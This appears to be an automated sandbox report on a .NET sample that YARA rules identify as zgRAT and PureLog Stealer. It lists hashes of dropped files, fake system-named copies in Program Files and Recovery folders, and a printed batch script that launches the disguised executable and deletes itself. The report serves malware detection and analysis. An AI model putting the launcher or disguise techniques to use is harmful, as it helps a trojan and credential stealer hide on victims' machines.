                                                                                                    SHA-512:23DBFCD277629D362D7393C4D0DC6C7FE2F5C574C8C588C5F295FE46E82A338EE5729CF3EFB02CED0112B8EAA862F862459DAC3106F0A279530F9032589CC80E
                                                                                                    Malicious:false
                                                                                                    Preview:zPP872CggI0yeUV7n97DrFCHpY5Qslwb9hRTRzFLrj75yUg5NO97E3euNISi6wx5VYy7CCqy4wWIHGTV19CdlzXGDhGIggO4vCjafj2LiLCShVmGz7r6uTTgBs4e5hRYibXFg30RH05awEir59TjzRKbsDYwpYPA4ouF8gj5HZz3X3t6KMj6NrjQR5WdeDmtl5gIUctYaXc
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):41
                                                                                                    Entropy (8bit):4.753774260662877
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:XsmnVTPPW2Ag:cmnVCng
                                                                                                    MD5:3AE5490F45DB209198E97DECB022743F
                                                                                                    SHA1:01BAAE785C8C44EC8AC571317EB0DD4D6F3984EE
                                                                                                    SHA-256:BA27B3825702D2AFD11810BA717EEE1837F12EF0DCFBC9F912F1F60CF8025F04
                                                                                                    SHA-512:DB76FB82E388807963164202FBC6CFAFEF9BB4EACF87A35E157E3C5DEE1DE40AB06E3ED60030226734558B5511988EF7B204D953A38491883DC661A529E98CC8
                                                                                                    Malicious:false
                                                                                                    Preview:vXD2bv1UuNc4ebCBxxkGwxZLz5Ote6tHjhxCDuFeE
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x471953c7, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1310720
                                                                                                    Entropy (8bit):0.4221308841936005
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
                                                                                                    MD5:658934D3D918871B76EB9EAD737BD109
                                                                                                    SHA1:811E318C4C27101F12CBAAE02058AADCB8A63DEA
                                                                                                    SHA-256:F16CE34DACE190EFF9F94572BDE48C554D18780B3D4409D5164476BB5F2873F2
                                                                                                    SHA-512:5730A77FB4489F9469EE68EA6B334A07B8A5FB89D6659A615AB79BA6E83943458DB77807E85602DD37640121F7D36CD97F19698AEDFCF4D484FF689FB6FC6DE6
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with very long lines (720), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):720
                                                                                                    Entropy (8bit):5.90190945805779
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:QM7rbMzDW7ioRHR5+IUQFjwi2tFjBAqq1e/t0ewbm2efnOfJa/zrTUmKzbVrK:Qy0zDGiqH6PWsi2fpl10ewMfnOfJa/HJ
                                                                                                    MD5:876D783F8FC9C31C70A5D217C980CE7D
                                                                                                    SHA1:2485A88315E9DCC39E1245AD4D60AB417B264036
                                                                                                    SHA-256:40D1A0315DD04842E576B9A5CB4E99C2EFC088CE21A0219E3CF65C1BBB43D624
                                                                                                    SHA-512:E6127E8E6C0FAEB61048D32EEE1E4B242F9F8DCBDEC649AEA9F1B7EEF669E2EA3BC360AA61F771FB3530B35D5B8E427669752A595605646CAD93FCB6B9459104
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3038208
                                                                                                    Entropy (8bit):7.223328720275886
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:49152:X1PeNLJnZWUGUJbjrTWTYOX9mQgTilflXBMuUd/tqYZWurPrEPPQXzCLkUoIjn3:XtelWUG3YOX9mQgGlBBMfd/HprPrEn3n
                                                                                                    MD5:F9589E19D9A2FFBFACB439B029AB4F06
                                                                                                    SHA1:0EB7246EE67D0A7289A1EB5D76A4DF8F1C6A4A72
                                                                                                    SHA-256:6D86B21FEC8D0F8698E2E22AEDA3FBD0381300E8A746BF082418D809B9763156
                                                                                                    SHA-512:B2EBC7249F727A529A693480689F3080189915C702B4E0F369207989D38482B6B2013DAA1A3010D488CA8E64DD56DC4156B67EDA80195D8A0C438B794577D87A
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):26
                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                    Malicious:true
                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1830
                                                                                                    Entropy (8bit):5.3661116947161815
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHV1qHGIs0HKGHKlT4vHNpv:iqbYqGSI6oPtzHeqKkt1wmj0qGqZ4vtd
                                                                                                    MD5:F3475F6FF1F713C7C9DAACC1DF623E58
                                                                                                    SHA1:AED39B5923CCC56514F33B73DF64A13706CE0DAE
                                                                                                    SHA-256:3AE4E8E8ADBD758B6E39EA3D7B8E680F3160F6E5D48DAF1F0419236F1978CDCE
                                                                                                    SHA-512:65B0309ABFBEFD2A749F3DEDBEE74CF5160BF42049C8A67AE30DB786092EC3553F1C8F16C5C40004650CB3926C84F061E37C796CA92266F582B3E48D5A237C32
                                                                                                    Malicious:true
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyT
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                    Process:C:\Recovery\TItoGxsDkTEZBWdlQNGwopi.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                    Process:C:\Program Files (x86)\Windows Sidebar\Gadgets\services.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                    Process:C:\Program Files (x86)\Windows NT\smartscreen.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98304
                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40960
                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):0.5712781801655107
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):0.5707520969659783
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                    Malicious:false
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25
                                                                                                    Entropy (8bit):4.323856189774724
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:nCFz6nmVLTJ:oWinJ
                                                                                                    MD5:D6AEBFF62CA3CEB8429C5158150E01BC
                                                                                                    SHA1:FED63341BA856653AB4D8C3B4120E9BD2EC398C8
                                                                                                    SHA-256:FA22A65CB569293C9E1DED374F98B3706D7531A198C9648459EE5B366C58BF85
                                                                                                    SHA-512:C1943F9325FCEB3108D421ECA0012DF38DCF02182B7D0B98B197546043C8B48268C8AE5B1E0B299264DE26E5A3DF97AACBD693CA35B4CE569CA263C1DC679BC2
                                                                                                    Malicious:false
                                                                                                    Preview:akgAl2sV0LCBBDv9hhpnvU80Q
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187
                                                                                                    Entropy (8bit):5.1778388835327185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5SMLBLM2HOBEIpGNHovBktKcKZG1t+kiE2JM:hCRLuVFOOr+DER5SMLDVVVovKOZG1wkF
                                                                                                    MD5:DAB2C7082BFA3CB2A3C9206B182172EA
                                                                                                    SHA1:CAEAE1867C7B5B736A3B9BDCB8AEC92206029C1B
                                                                                                    SHA-256:E5998A2D833F6C4641DB98C682232BF874DC39EF2B9D0E0CA31278941EC80F1B
                                                                                                    SHA-512:93CA34118E12AAF69E73A67BD07A02B047D5C953DDD9C72A71B23740A2DB021B3CA72FFCB9783B26A4C73E7D2B74F8771DA4AE108B3AE774C0A56EC5503D7774
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B7heSupDrt.bat"
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 4 15:04:46 2025, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1956
                                                                                                    Entropy (8bit):4.549437628852929
